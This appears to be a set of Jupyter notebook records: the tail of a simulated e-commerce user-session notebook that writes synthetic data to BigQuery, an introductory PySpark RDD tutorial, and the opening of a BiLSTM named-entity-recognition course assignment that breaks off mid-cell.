05:26:12.686658\nadd_to_basket 2021-04-09 05:26:41.686658\nopen_basket 2021-04-09 05:28:21.686658\nremove_from_basket 2021-04-09 05:30:16.686658\nsearch 2021-04-09 05:30:32.686658\nsearch 2021-04-09 05:30:58.686658\nsearch 2021-04-09 05:32:40.686658\nview_item 2021-04-09 05:33:29.686658\n\nUSER: 69\nvisit 2021-04-09 05:21:46.686658\nsearch 2021-04-09 05:21:55.686658\nview_item 2021-04-09 05:22:35.686658\nview_item 2021-04-09 05:23:01.686658\nview_item 2021-04-09 05:23:14.686658\nview_item 2021-04-09 05:23:40.686658\nview_item 2021-04-09 05:24:03.686658\ncreate_account 2021-04-09 05:24:18.686658\nsearch 2021-04-09 05:26:26.686658\n\nUSER: 70\nvisit 2021-04-09 05:22:47.686658\nsearch 2021-04-09 05:23:05.686658\nsearch 2021-04-09 05:24:03.686658\nview_item 2021-04-09 05:25:22.686658\nsearch 2021-04-09 05:25:41.686658\nsearch 2021-04-09 05:27:39.686658\nsearch 2021-04-09 05:28:28.686658\nsearch 2021-04-09 05:29:24.686658\n\nUSER: 71\nvisit 2021-04-09 05:23:48.686658\ncreate_account 2021-04-09 05:23:51.686658\nsearch 2021-04-09 05:25:29.686658\nsearch 2021-04-09 05:25:44.686658\nview_item 2021-04-09 05:26:12.686658\nsend_message 2021-04-09 05:26:41.686658\n\nUSER: 72\nvisit 2021-04-09 05:24:49.686658\nsearch 2021-04-09 05:25:03.686658\nsearch 2021-04-09 05:25:29.686658\nsearch 2021-04-09 05:25:39.686658\nsearch 2021-04-09 05:27:37.686658\nsearch 2021-04-09 05:28:26.686658\nsearch 2021-04-09 05:29:22.686658\n\nUSER: 73\nvisit 2021-04-09 05:25:50.686658\n\nUSER: 74\nvisit 2021-04-09 05:26:51.686658\nsearch 2021-04-09 05:26:53.686658\nview_item 2021-04-09 05:27:11.686658\nsearch 2021-04-09 05:27:38.686658\nsearch 2021-04-09 05:29:03.686658\n\nUSER: 75\nvisit 2021-04-09 05:27:52.686658\nsearch 2021-04-09 05:27:53.686658\n\nUSER: 76\nvisit 2021-04-09 05:28:53.686658\ncreate_account 2021-04-09 05:28:57.686658\nsearch 2021-04-09 05:30:03.686658\nview_item 2021-04-09 05:31:05.686658\nsearch 2021-04-09 05:31:26.686658\nsearch 2021-04-09 05:32:10.686658\n\nUSER: 77\nvisit 2021-04-09 05:29:54.686658\nsearch 2021-04-09 05:30:01.686658\nview_item 2021-04-09 05:31:49.686658\nview_item 2021-04-09 05:32:04.686658\nsearch 2021-04-09 05:32:18.686658\nview_item 2021-04-09 05:33:17.686658\nview_item 2021-04-09 05:33:44.686658\nview_item 2021-04-09 05:34:12.686658\ncreate_account 2021-04-09 05:34:37.686658\nsearch 2021-04-09 05:36:20.686658\nview_item 2021-04-09 05:37:03.686658\n\nUSER: 78\nvisit 2021-04-09 05:30:55.686658\nsearch 2021-04-09 05:30:57.686658\nview_item 2021-04-09 05:31:30.686658\ncreate_account 
2021-04-09 05:31:51.686658\nsearch 2021-04-09 05:32:31.686658\nview_item 2021-04-09 05:33:11.686658\nview_item 2021-04-09 05:33:34.686658\nadd_to_basket 2021-04-09 05:33:52.686658\nopen_basket 2021-04-09 05:34:14.686658\npay 2021-04-09 05:34:20.686658\n\nUSER: 79\nvisit 2021-04-09 05:31:56.686658\n\nUSER: 80\nvisit 2021-04-09 05:32:57.686658\ncreate_account 2021-04-09 05:33:10.686658\nsearch 2021-04-09 05:33:47.686658\nview_item 2021-04-09 05:34:20.686658\nview_item 2021-04-09 05:34:33.686658\nsearch 2021-04-09 05:34:46.686658\nsearch 2021-04-09 05:36:22.686658\nview_item 2021-04-09 05:37:17.686658\n\nUSER: 81\nvisit 2021-04-09 05:33:58.686658\nsearch 2021-04-09 05:34:11.686658\ncreate_account 2021-04-09 05:34:22.686658\nsearch 2021-04-09 05:35:03.686658\nsearch 2021-04-09 05:36:51.686658\nsearch 2021-04-09 05:38:40.686658\nview_item 2021-04-09 05:38:58.686658\nview_item 2021-04-09 05:39:12.686658\n\nUSER: 82\nvisit 2021-04-09 05:34:59.686658\nsearch 2021-04-09 05:35:13.686658\nview_item 2021-04-09 05:36:33.686658\ncreate_account 2021-04-09 05:36:54.686658\nsearch 2021-04-09 05:37:36.686658\nsearch 2021-04-09 05:38:53.686658\nsearch 2021-04-09 05:40:21.686658\nsearch 2021-04-09 05:40:36.686658\nview_item 2021-04-09 05:41:23.686658\n\nUSER: 83\nvisit 2021-04-09 05:36:00.686658\nsearch 2021-04-09 05:36:13.686658\nview_item 2021-04-09 05:36:34.686658\ncreate_account 2021-04-09 05:36:44.686658\nsearch 2021-04-09 05:38:21.686658\nlist_item 2021-04-09 05:39:47.686658\n\nUSER: 84\nvisit 2021-04-09 05:37:01.686658\nsearch 2021-04-09 05:37:17.686658\nview_item 2021-04-09 05:38:45.686658\nview_item 2021-04-09 05:38:58.686658\nview_item 2021-04-09 05:39:25.686658\n\nUSER: 85\nvisit 2021-04-09 05:38:02.686658\nsearch 2021-04-09 05:38:13.686658\nsearch 2021-04-09 05:39:27.686658\nview_item 2021-04-09 05:41:26.686658\nview_item 2021-04-09 05:41:55.686658\nsearch 2021-04-09 05:42:07.686658\nview_item 2021-04-09 05:42:18.686658\nview_item 2021-04-09 05:42:35.686658\ncreate_account 2021-04-09 05:43:04.686658\nsearch 2021-04-09 05:44:44.686658\nview_item 2021-04-09 05:46:25.686658\n\nUSER: 86\nvisit 2021-04-09 05:39:03.686658\ncreate_account 2021-04-09 05:39:15.686658\nlist_item 2021-04-09 05:41:40.686658\n\nUSER: 87\nvisit 2021-04-09 05:40:04.686658\nsearch 2021-04-09 05:40:14.686658\nview_item 2021-04-09 05:41:37.686658\nsearch 2021-04-09 05:42:03.686658\ncreate_account 2021-04-09 05:43:23.686658\nsearch 2021-04-09 05:45:12.686658\nview_item 2021-04-09 05:45:57.686658\nsearch 2021-04-09 05:46:20.686658\nview_item 2021-04-09 05:47:52.686658\nadd_to_basket 2021-04-09 05:48:11.686658\nopen_basket 2021-04-09 05:48:38.686658\nremove_from_basket 2021-04-09 05:50:26.686658\nsearch 2021-04-09 05:50:34.686658\nview_item 2021-04-09 05:52:15.686658\nadd_to_basket 2021-04-09 05:52:36.686658\nview_item 2021-04-09 05:53:33.686658\n\nUSER: 88\nvisit 2021-04-09 05:41:05.686658\nsearch 2021-04-09 05:41:11.686658\nsearch 2021-04-09 05:42:55.686658\nview_item 2021-04-09 05:43:35.686658\n\nUSER: 89\nvisit 2021-04-09 05:42:06.686658\n\nUSER: 90\nvisit 2021-04-09 05:43:07.686658\nsearch 2021-04-09 05:43:26.686658\n\nUSER: 91\nvisit 2021-04-09 05:44:08.686658\nsearch 2021-04-09 05:44:14.686658\nsearch 2021-04-09 05:45:27.686658\nview_item 2021-04-09 05:47:21.686658\nview_item 2021-04-09 05:47:41.686658\nsearch 2021-04-09 05:47:56.686658\nview_item 2021-04-09 05:48:33.686658\ncreate_account 2021-04-09 05:48:48.686658\nsearch 2021-04-09 05:50:34.686658\nsearch 2021-04-09 05:51:14.686658\nview_item 2021-04-09 
05:52:21.686658\nview_item 2021-04-09 05:52:48.686658\nview_item 2021-04-09 05:53:03.686658\n\nUSER: 92\nvisit 2021-04-09 05:45:09.686658\n\nUSER: 93\nvisit 2021-04-09 05:46:10.686658\nsearch 2021-04-09 05:46:16.686658\nview_item 2021-04-09 05:47:26.686658\ncreate_account 2021-04-09 05:47:52.686658\nsearch 2021-04-09 05:49:28.686658\nsearch 2021-04-09 05:51:10.686658\nsearch 2021-04-09 05:52:46.686658\nsearch 2021-04-09 05:53:28.686658\nview_item 2021-04-09 05:53:48.686658\nadd_to_basket 2021-04-09 05:54:04.686658\nview_item 2021-04-09 05:54:41.686658\nsearch 2021-04-09 05:54:55.686658\nsearch 2021-04-09 05:55:15.686658\nopen_basket 2021-04-09 05:56:25.686658\npay 2021-04-09 05:58:20.686658\n\nUSER: 94\nvisit 2021-04-09 05:47:11.686658\n\nUSER: 95\nvisit 2021-04-09 05:48:12.686658\ncreate_account 2021-04-09 05:48:28.686658\nsearch 2021-04-09 05:49:08.686658\nview_item 2021-04-09 05:49:38.686658\nsearch 2021-04-09 05:49:51.686658\n\nUSER: 96\nvisit 2021-04-09 05:49:13.686658\ncreate_account 2021-04-09 05:49:21.686658\n\nUSER: 97\nvisit 2021-04-09 05:50:14.686658\n\nUSER: 98\nvisit 2021-04-09 05:51:15.686658\nsearch 2021-04-09 05:51:32.686658\nview_item 2021-04-09 05:52:04.686658\ncreate_account 2021-04-09 05:52:25.686658\nsearch 2021-04-09 05:53:50.686658\nview_item 2021-04-09 05:55:31.686658\nsearch 2021-04-09 05:55:44.686658\n\nUSER: 99\nvisit 2021-04-09 05:52:16.686658\nsearch 2021-04-09 05:52:28.686658\n\nUSER: 100\nvisit 2021-04-09 05:53:17.686658\n" ], [ "for user_id in users.keys():\n if user_id != 1:\n print(f'user_id: {user_id}, satisfaction: {users[user_id].satisfaction}, visit probability: {users[user_id].visit_probability}')", "user_id: 2, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 3, satisfaction: 0, visit probability: 0.01\nuser_id: 4, satisfaction: 0, visit probability: 0.01\nuser_id: 5, satisfaction: -5, visit probability: 0.005\nuser_id: 6, satisfaction: 10, visit probability: 0.02\nuser_id: 7, satisfaction: 0, visit probability: 0.01\nuser_id: 8, satisfaction: 2, visit probability: 0.012\nuser_id: 9, satisfaction: -3, visit probability: 0.007\nuser_id: 10, satisfaction: 0, visit probability: 0.01\nuser_id: 11, satisfaction: 0, visit probability: 0.01\nuser_id: 12, satisfaction: 0, visit probability: 0.01\nuser_id: 13, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 14, satisfaction: -2, visit probability: 0.008\nuser_id: 15, satisfaction: 0, visit probability: 0.01\nuser_id: 16, satisfaction: 1, visit probability: 0.011\nuser_id: 17, satisfaction: 0, visit probability: 0.01\nuser_id: 18, satisfaction: -4, visit probability: 0.006\nuser_id: 19, satisfaction: 6, visit probability: 0.016\nuser_id: 20, satisfaction: 10, visit probability: 0.02\nuser_id: 21, satisfaction: 0, visit probability: 0.01\nuser_id: 22, satisfaction: 5, visit probability: 0.015\nuser_id: 23, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 24, satisfaction: 0, visit probability: 0.01\nuser_id: 25, satisfaction: 6, visit probability: 0.016\nuser_id: 26, satisfaction: 0, visit probability: 0.01\nuser_id: 27, satisfaction: 4, visit probability: 0.014\nuser_id: 28, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 29, satisfaction: 0, visit probability: 0.01\nuser_id: 30, satisfaction: 9, visit probability: 0.019\nuser_id: 31, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 32, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 33, satisfaction: 8, visit probability: 
0.018000000000000002\nuser_id: 34, satisfaction: -2, visit probability: 0.008\nuser_id: 35, satisfaction: 4, visit probability: 0.014\nuser_id: 36, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 37, satisfaction: 1, visit probability: 0.011\nuser_id: 38, satisfaction: 0, visit probability: 0.01\nuser_id: 39, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 40, satisfaction: 0, visit probability: 0.01\nuser_id: 41, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 42, satisfaction: 6, visit probability: 0.016\nuser_id: 43, satisfaction: -2, visit probability: 0.008\nuser_id: 44, satisfaction: 0, visit probability: 0.01\nuser_id: 45, satisfaction: 7, visit probability: 0.017\nuser_id: 46, satisfaction: 10, visit probability: 0.02\nuser_id: 47, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 48, satisfaction: 20, visit probability: 0.03\nuser_id: 49, satisfaction: 0, visit probability: 0.01\nuser_id: 50, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 51, satisfaction: 0, visit probability: 0.01\nuser_id: 52, satisfaction: 0, visit probability: 0.01\nuser_id: 53, satisfaction: -4, visit probability: 0.006\nuser_id: 54, satisfaction: 0, visit probability: 0.01\nuser_id: 55, satisfaction: -2, visit probability: 0.008\nuser_id: 56, satisfaction: 10, visit probability: 0.02\nuser_id: 57, satisfaction: 9, visit probability: 0.019\nuser_id: 58, satisfaction: 9, visit probability: 0.019\nuser_id: 59, satisfaction: 0, visit probability: 0.01\nuser_id: 60, satisfaction: -3, visit probability: 0.007\nuser_id: 61, satisfaction: 0, visit probability: 0.01\nuser_id: 62, satisfaction: 5, visit probability: 0.015\nuser_id: 63, satisfaction: 4, visit probability: 0.014\nuser_id: 64, satisfaction: 7, visit probability: 0.017\nuser_id: 65, satisfaction: 9, visit probability: 0.019\nuser_id: 66, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 67, satisfaction: 24, visit probability: 0.034\nuser_id: 68, satisfaction: 1, visit probability: 0.011\nuser_id: 69, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 70, satisfaction: -7, visit probability: 0.003\nuser_id: 71, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 72, satisfaction: -6, visit probability: 0.004\nuser_id: 73, satisfaction: 0, visit probability: 0.01\nuser_id: 74, satisfaction: -4, visit probability: 0.006\nuser_id: 75, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 76, satisfaction: 6, visit probability: 0.016\nuser_id: 77, satisfaction: 1, visit probability: 0.011\nuser_id: 78, satisfaction: 25, visit probability: 0.035\nuser_id: 79, satisfaction: 0, visit probability: 0.01\nuser_id: 80, satisfaction: 4, visit probability: 0.014\nuser_id: 81, satisfaction: 4, visit probability: 0.014\nuser_id: 82, satisfaction: 3, visit probability: 0.013000000000000001\nuser_id: 83, satisfaction: 8, visit probability: 0.018000000000000002\nuser_id: 84, satisfaction: -4, visit probability: 0.006\nuser_id: 85, satisfaction: 1, visit probability: 0.011\nuser_id: 86, satisfaction: 11, visit probability: 0.020999999999999998\nuser_id: 87, satisfaction: 0, visit probability: 0.01\nuser_id: 88, satisfaction: -3, visit probability: 0.007\nuser_id: 89, satisfaction: 0, visit probability: 0.01\nuser_id: 90, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 91, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 92, satisfaction: 0, visit probability: 0.01\nuser_id: 93, 
satisfaction: 20, visit probability: 0.03\nuser_id: 94, satisfaction: 0, visit probability: 0.01\nuser_id: 95, satisfaction: 7, visit probability: 0.017\nuser_id: 96, satisfaction: 10, visit probability: 0.02\nuser_id: 97, satisfaction: 0, visit probability: 0.01\nuser_id: 98, satisfaction: 5, visit probability: 0.015\nuser_id: 99, satisfaction: -1, visit probability: 0.009000000000000001\nuser_id: 100, satisfaction: 0, visit probability: 0.01\n" ], [ "users[31].registered", "_____no_output_____" ] ], [ [ "## Writing data to bigquery", "_____no_output_____" ] ], [ [ "from google.cloud import storage\nfrom google.cloud import bigquery\n\nimport sys\nimport os", "_____no_output_____" ], [ "bigquery_client = bigquery.Client.from_service_account_json('../../credentials/data-analysis-sql-309220-6ce084250abd.json')", "_____no_output_____" ], [ "countries = ['UK', 'DE', 'AT']\ncountries_probs = [0.5, 0.4, 0.1]\n\nagents = ['android', 'ios', 'web']\nagents_probs = [0.4, 0.3, 0.3]\n\nrand = np.random.default_rng(seed=1)\n\nobjects = []\nfor i in range(1000):\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n object = {\n 'timestamp': timestamp,\n 'id': str(hash(timestamp)),\n 'nested': {\n 'os': rand.choice(a=agents, p=agents_probs),\n 'country': rand.choice(a=countries, p=countries_probs)\n }\n }\n \n objects.append(object)\n \n time.sleep(0.01)", "_____no_output_____" ], [ "bq_error = bigquery_client.insert_rows_json('data-analysis-sql-309220.synthetic.nested_test', objects)\nif bq_error != []:\n print(bq_error) ", "_____no_output_____" ] ] ]
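The simulation cells above drive each user session by re-weighting the candidate next events, renormalizing the weights, and drawing with a seeded NumPy generator. The following is a minimal sketch of that single step, assuming the `events` transition table defined earlier in the notebook; `draw_next_event` and the toy table are illustrative names only, not part of the source.

```python
import numpy as np

def draw_next_event(last_event, events, seed):
    """Sample the next user event from the transition table.

    events[last_event] holds parallel lists: candidate 'next_events' and their
    (possibly re-weighted) 'probabilities', renormalized here before the draw.
    """
    candidates = list(events[last_event]['next_events'])
    weights = list(events[last_event]['probabilities'])

    total = sum(weights)                      # renormalize after any adjustments
    probs = [w / total for w in weights]

    rng = np.random.default_rng(seed=seed)    # seeded draw, as in session()
    return rng.choice(a=candidates, p=probs)

# Toy transition table (hypothetical values, not the notebook's full dict):
toy_events = {'visit': {'next_events': ['search', 'create_account', 'do_nothing'],
                        'probabilities': [0.5, 0.2, 0.3]}}
print(draw_next_event('visit', toy_events, seed=42))
```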
[ "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
cb1fe444b37b84461e9e3e38eaee1db51503f708
6,644
ipynb
Jupyter Notebook
21-Big-Data-and-Spark/01-Introduction to Spark and Python.ipynb
atse0612/Python-for-Data-Science-and-Machine-Learning-Bootcamp
56687174b2b62feb3482940bf8ea1638a366df09
[ "MIT" ]
null
null
null
21-Big-Data-and-Spark/01-Introduction to Spark and Python.ipynb
atse0612/Python-for-Data-Science-and-Machine-Learning-Bootcamp
56687174b2b62feb3482940bf8ea1638a366df09
[ "MIT" ]
9
2020-09-25T21:49:09.000Z
2022-02-10T01:24:14.000Z
21-Big-Data-and-Spark/01-Introduction to Spark and Python.ipynb
atse0612/Python-for-Data-Science-and-Machine-Learning-Bootcamp
56687174b2b62feb3482940bf8ea1638a366df09
[ "MIT" ]
2
2020-08-17T17:54:20.000Z
2020-09-06T04:10:05.000Z
23.644128
424
0.568031
[ [ [ "# Introduction to Spark and Python\n\nLet's learn how to use Spark with Python by using the pyspark library! Make sure to view the video lecture explaining Spark and RDDs before continuing on with this code.\n\nThis notebook will serve as reference code for the Big Data section of the course involving Amazon Web Services. The video will provide fuller explanations for what the code is doing.\n\n## Creating a SparkContext\n\nFirst we need to create a SparkContext. We will import this from pyspark:", "_____no_output_____" ] ], [ [ "from pyspark import SparkContext", "_____no_output_____" ] ], [ [ "Now create the SparkContext,A SparkContext represents the connection to a Spark cluster, and can be used to create an RDD and broadcast variables on that cluster.\n\n*Note! You can only have one SparkContext at a time the way we are running things here.*", "_____no_output_____" ] ], [ [ "sc = SparkContext()", "_____no_output_____" ] ], [ [ "## Basic Operations\n\nWe're going to start with a 'hello world' example, which is just reading a text file. First let's create a text file.\n___", "_____no_output_____" ], [ "Let's write an example text file to read, we'll use some special jupyter notebook commands for this, but feel free to use any .txt file:", "_____no_output_____" ] ], [ [ "%%writefile example.txt\nfirst line\nsecond line\nthird line\nfourth line", "Overwriting example.txt\n" ] ], [ [ "### Creating the RDD", "_____no_output_____" ], [ "Now we can take in the textfile using the **textFile** method off of the SparkContext we created. This method will read a text file from HDFS, a local file system (available on all\nnodes), or any Hadoop-supported file system URI, and return it as an RDD of Strings.", "_____no_output_____" ] ], [ [ "textFile = sc.textFile('example.txt')", "_____no_output_____" ] ], [ [ "Spark’s primary abstraction is a distributed collection of items called a Resilient Distributed Dataset (RDD). RDDs can be created from Hadoop InputFormats (such as HDFS files) or by transforming other RDDs. \n\n### Actions\n\nWe have just created an RDD using the textFile method and can perform operations on this object, such as counting the rows.\n\nRDDs have actions, which return values, and transformations, which return pointers to new RDDs. Let’s start with a few actions:", "_____no_output_____" ] ], [ [ "textFile.count()", "_____no_output_____" ], [ "textFile.first()", "_____no_output_____" ] ], [ [ "### Transformations\n\nNow we can use transformations, for example the filter transformation will return a new RDD with a subset of items in the file. Let's create a sample transformation using the filter() method. This method (just like Python's own filter function) will only return elements that satisfy the condition. Let's try looking for lines that contain the word 'second'. In which case, there should only be one line that has that.", "_____no_output_____" ] ], [ [ "secfind = textFile.filter(lambda line: 'second' in line)", "_____no_output_____" ], [ "# RDD\nsecfind", "_____no_output_____" ], [ "# Perform action on transformation\nsecfind.collect()", "_____no_output_____" ], [ "# Perform action on transformation\nsecfind.count()", "_____no_output_____" ] ], [ [ "Notice how the transformations won't display an output and won't be run until an action is called. In the next lecture: Advanced Spark and Python we will begin to see many more examples of this transformation and action relationship!\n\n# Great Job!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ] ]
cb20112cd84e0dafb6a54b9300189e1a09928161
36,459
ipynb
Jupyter Notebook
week2/week2-NER.ipynb
rahul263-stack/PROJECT-Dump
d8b1cfe0da8cad9fe2f3bbd427334b979c7d2c09
[ "MIT" ]
1
2020-04-06T04:41:56.000Z
2020-04-06T04:41:56.000Z
week2/week2-NER.ipynb
rahul263-stack/quarantine
d8b1cfe0da8cad9fe2f3bbd427334b979c7d2c09
[ "MIT" ]
null
null
null
week2/week2-NER.ipynb
rahul263-stack/quarantine
d8b1cfe0da8cad9fe2f3bbd427334b979c7d2c09
[ "MIT" ]
null
null
null
38.257083
798
0.594833
[ [ [ "# Recognize named entities on Twitter with LSTMs\n\nIn this assignment, you will use a recurrent neural network to solve Named Entity Recognition (NER) problem. NER is a common task in natural language processing systems. It serves for extraction such entities from the text as persons, organizations, locations, etc. In this task you will experiment to recognize named entities from Twitter.\n\nFor example, we want to extract persons' and organizations' names from the text. Than for the input text:\n\n Ian Goodfellow works for Google Brain\n\na NER model needs to provide the following sequence of tags:\n\n B-PER I-PER O O B-ORG I-ORG\n\nWhere *B-* and *I-* prefixes stand for the beginning and inside of the entity, while *O* stands for out of tag or no tag. Markup with the prefix scheme is called *BIO markup*. This markup is introduced for distinguishing of consequent entities with similar types.\n\nA solution of the task will be based on neural networks, particularly, on Bi-Directional Long Short-Term Memory Networks (Bi-LSTMs).\n\n### Libraries\n\nFor this task you will need the following libraries:\n - [Tensorflow](https://www.tensorflow.org) — an open-source software library for Machine Intelligence.\n \nIn this assignment, we use Tensorflow 1.15.0. You can install it with pip:\n\n !pip install tensorflow==1.15.0\n \n - [Numpy](http://www.numpy.org) — a package for scientific computing.\n \nIf you have never worked with Tensorflow, you would probably need to read some tutorials during your work on this assignment, e.g. [this one](https://www.tensorflow.org/tutorials/recurrent) could be a good starting point. ", "_____no_output_____" ], [ "### Data\n\nThe following cell will download all data required for this assignment into the folder `week2/data`.", "_____no_output_____" ] ], [ [ "try:\n import google.colab\n IN_COLAB = True\nexcept:\n IN_COLAB = False\n\nif IN_COLAB:\n ! wget https://raw.githubusercontent.com/hse-aml/natural-language-processing/master/setup_google_colab.py -O setup_google_colab.py\n import setup_google_colab\n setup_google_colab.setup_week2()\n\nimport sys\nsys.path.append(\"..\")\nfrom common.download_utils import download_week2_resources\n\ndownload_week2_resources()", "_____no_output_____" ] ], [ [ "### Load the Twitter Named Entity Recognition corpus\n\nWe will work with a corpus, which contains tweets with NE tags. Every line of a file contains a pair of a token (word/punctuation symbol) and a tag, separated by a whitespace. Different tweets are separated by an empty line.\n\nThe function *read_data* reads a corpus from the *file_path* and returns two lists: one with tokens and one with the corresponding tags. You need to complete this function by adding a code, which will replace a user's nickname to `<USR>` token and any URL to `<URL>` token. 
You could think that a URL and a nickname are just strings which start with *http://* or *https://* in case of URLs and a *@* symbol for nicknames.", "_____no_output_____" ] ], [ [ "def read_data(file_path):\n tokens = []\n tags = []\n \n tweet_tokens = []\n tweet_tags = []\n for line in open(file_path, encoding='utf-8'):\n line = line.strip()\n if not line:\n if tweet_tokens:\n tokens.append(tweet_tokens)\n tags.append(tweet_tags)\n tweet_tokens = []\n tweet_tags = []\n else:\n token, tag = line.split()\n # Replace all urls with <URL> token\n # Replace all users with <USR> token\n\n ######################################\n ######### YOUR CODE HERE #############\n ######################################\n \n tweet_tokens.append(token)\n tweet_tags.append(tag)\n \n return tokens, tags", "_____no_output_____" ] ], [ [ "And now we can load three separate parts of the dataset:\n - *train* data for training the model;\n - *validation* data for evaluation and hyperparameters tuning;\n - *test* data for final evaluation of the model.", "_____no_output_____" ] ], [ [ "train_tokens, train_tags = read_data('data/train.txt')\nvalidation_tokens, validation_tags = read_data('data/validation.txt')\ntest_tokens, test_tags = read_data('data/test.txt')", "_____no_output_____" ] ], [ [ "You should always understand what kind of data you deal with. For this purpose, you can print the data running the following cell:", "_____no_output_____" ] ], [ [ "for i in range(3):\n for token, tag in zip(train_tokens[i], train_tags[i]):\n print('%s\\t%s' % (token, tag))\n print()", "_____no_output_____" ] ], [ [ "### Prepare dictionaries\n\nTo train a neural network, we will use two mappings: \n- {token}$\\to${token id}: address the row in embeddings matrix for the current token;\n- {tag}$\\to${tag id}: one-hot ground truth probability distribution vectors for computing the loss at the output of the network.\n\nNow you need to implement the function *build_dict* which will return {token or tag}$\\to${index} and vice versa. ", "_____no_output_____" ] ], [ [ "from collections import defaultdict", "_____no_output_____" ], [ "def build_dict(tokens_or_tags, special_tokens):\n \"\"\"\n tokens_or_tags: a list of lists of tokens or tags\n special_tokens: some special tokens\n \"\"\"\n # Create a dictionary with default value 0\n tok2idx = defaultdict(lambda: 0)\n idx2tok = []\n \n # Create mappings from tokens (or tags) to indices and vice versa.\n # At first, add special tokens (or tags) to the dictionaries.\n # The first special token must have index 0.\n \n # Mapping tok2idx should contain each token or tag only once. \n # To do so, you should:\n # 1. extract unique tokens/tags from the tokens_or_tags variable, which is not\n # occur in special_tokens (because they could have non-empty intersection)\n # 2. index them (for example, you can add them into the list idx2tok\n # 3. for each token/tag save the index into tok2idx).\n \n ######################################\n ######### YOUR CODE HERE #############\n ######################################\n \n return tok2idx, idx2tok", "_____no_output_____" ] ], [ [ "After implementing the function *build_dict* you can make dictionaries for tokens and tags. 
Special tokens in our case will be:\n - `<UNK>` token for out of vocabulary tokens;\n - `<PAD>` token for padding sentence to the same length when we create batches of sentences.", "_____no_output_____" ] ], [ [ "special_tokens = ['<UNK>', '<PAD>']\nspecial_tags = ['O']\n\n# Create dictionaries \ntoken2idx, idx2token = build_dict(train_tokens + validation_tokens, special_tokens)\ntag2idx, idx2tag = build_dict(train_tags, special_tags)", "_____no_output_____" ] ], [ [ "The next additional functions will help you to create the mapping between tokens and ids for a sentence. ", "_____no_output_____" ] ], [ [ "def words2idxs(tokens_list):\n return [token2idx[word] for word in tokens_list]\n\ndef tags2idxs(tags_list):\n return [tag2idx[tag] for tag in tags_list]\n\ndef idxs2words(idxs):\n return [idx2token[idx] for idx in idxs]\n\ndef idxs2tags(idxs):\n return [idx2tag[idx] for idx in idxs]", "_____no_output_____" ] ], [ [ "### Generate batches\n\nNeural Networks are usually trained with batches. It means that weight updates of the network are based on several sequences at every single time. The tricky part is that all sequences within a batch need to have the same length. So we will pad them with a special `<PAD>` token. It is also a good practice to provide RNN with sequence lengths, so it can skip computations for padding parts. We provide the batching function *batches_generator* readily available for you to save time. ", "_____no_output_____" ] ], [ [ "def batches_generator(batch_size, tokens, tags,\n shuffle=True, allow_smaller_last_batch=True):\n \"\"\"Generates padded batches of tokens and tags.\"\"\"\n \n n_samples = len(tokens)\n if shuffle:\n order = np.random.permutation(n_samples)\n else:\n order = np.arange(n_samples)\n\n n_batches = n_samples // batch_size\n if allow_smaller_last_batch and n_samples % batch_size:\n n_batches += 1\n\n for k in range(n_batches):\n batch_start = k * batch_size\n batch_end = min((k + 1) * batch_size, n_samples)\n current_batch_size = batch_end - batch_start\n x_list = []\n y_list = []\n max_len_token = 0\n for idx in order[batch_start: batch_end]:\n x_list.append(words2idxs(tokens[idx]))\n y_list.append(tags2idxs(tags[idx]))\n max_len_token = max(max_len_token, len(tags[idx]))\n \n # Fill in the data into numpy nd-arrays filled with padding indices.\n x = np.ones([current_batch_size, max_len_token], dtype=np.int32) * token2idx['<PAD>']\n y = np.ones([current_batch_size, max_len_token], dtype=np.int32) * tag2idx['O']\n lengths = np.zeros(current_batch_size, dtype=np.int32)\n for n in range(current_batch_size):\n utt_len = len(x_list[n])\n x[n, :utt_len] = x_list[n]\n lengths[n] = utt_len\n y[n, :utt_len] = y_list[n]\n yield x, y, lengths", "_____no_output_____" ] ], [ [ "## Build a recurrent neural network\n\nThis is the most important part of the assignment. Here we will specify the network architecture based on TensorFlow building blocks. It's fun and easy as a lego constructor! We will create an LSTM network which will produce probability distribution over tags for each token in a sentence. To take into account both right and left contexts of the token, we will use Bi-Directional LSTM (Bi-LSTM). Dense layer will be used on top to perform tag classification. 
", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nimport numpy as np", "_____no_output_____" ], [ "class BiLSTMModel():\n pass", "_____no_output_____" ] ], [ [ "First, we need to create [placeholders](https://www.tensorflow.org/api_docs/python/tf/compat/v1/placeholder) to specify what data we are going to feed into the network during the execution time. For this task we will need the following placeholders:\n - *input_batch* — sequences of words (the shape equals to [batch_size, sequence_len]);\n - *ground_truth_tags* — sequences of tags (the shape equals to [batch_size, sequence_len]);\n - *lengths* — lengths of not padded sequences (the shape equals to [batch_size]);\n - *dropout_ph* — dropout keep probability; this placeholder has a predefined value 1;\n - *learning_rate_ph* — learning rate; we need this placeholder because we want to change the value during training.\n\nIt could be noticed that we use *None* in the shapes in the declaration, which means that data of any size can be feeded. \n\nYou need to complete the function *declare_placeholders*.", "_____no_output_____" ] ], [ [ "def declare_placeholders(self):\n \"\"\"Specifies placeholders for the model.\"\"\"\n\n # Placeholders for input and ground truth output.\n self.input_batch = tf.placeholder(dtype=tf.int32, shape=[None, None], 